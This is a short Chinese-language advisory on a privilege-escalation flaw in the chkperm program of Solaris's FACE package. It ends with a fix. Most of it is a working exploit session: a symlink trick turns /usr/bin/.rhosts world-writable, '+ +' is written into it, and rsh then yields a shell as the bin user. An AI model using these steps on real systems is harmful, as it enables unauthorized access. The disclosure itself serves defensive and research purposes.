Access Command Environment包含的漏洞

涉及程序： FACE软件包中的chkperm 描述： Access Command Environment包含的漏洞 详细： Solaris 2.4, 2.5, and 2.5.1 (可能还有其他系统) 安装了一个叫 FACE (Framed Access Command Environment)的软件包。在这个软件包 中有一个程序chkperm是问题所在，

涉及程序：
FACE软件包中的chkperm

描述：
Access Command Environment包含的漏洞

详细：
Solaris 2.4, 2.5, and 2.5.1 (可能还有其他系统) 安装了一个叫 FACE (Framed Access Command Environment)的软件包。在这个软件包 中有一个程序"chkperm"是问题所在，他是用来用户是否有使用FACE许可的程序。 这漏洞将可以轻易造出一个BIN用户。


以下代码仅仅用来测试和研究这个漏洞，如果您将其用于不正当的途径请后果自负


% mkdir /tmp/foo
% mkdir /tmp/foo/lib
% chmod -R 777 /tmp/foo
% setenv VMSYS /tmp/foo
% umask 0000
% ln -s /usr/bin/.rhosts /tmp/foo/lib/.facerc
% /usr/vmsys/bin/chkperm -l -u foo
% ls -l /usr/bin/.rhosts

-rw-rw-rw- 2 bin bin 0 Nov 12 09:41 .rhosts
% echo "+ +" >> /usr/bin/.rhosts
% ls -l /usr/bin/.rhosts
-rw-rw-rw- 2 bin bin 4 Nov 12 09:41 .rhosts
% rsh -l bin localhost /bin/csh -i
Warning: no access to tty; thus no job control in this shell... % id
uid=2(bin) gid=2(bin)

受影响的系统；
安装了(FACEFramed Access Command Environment)Solaris 2.4, 2.5 (?), 2.5.1(?) and 或其他源于System V 的UNIX系统。

解决方案：
CNNS为您提供完善的网络安全服务。

安全建议：
% chmod ug-s /usr/vmsys/bin/chkperm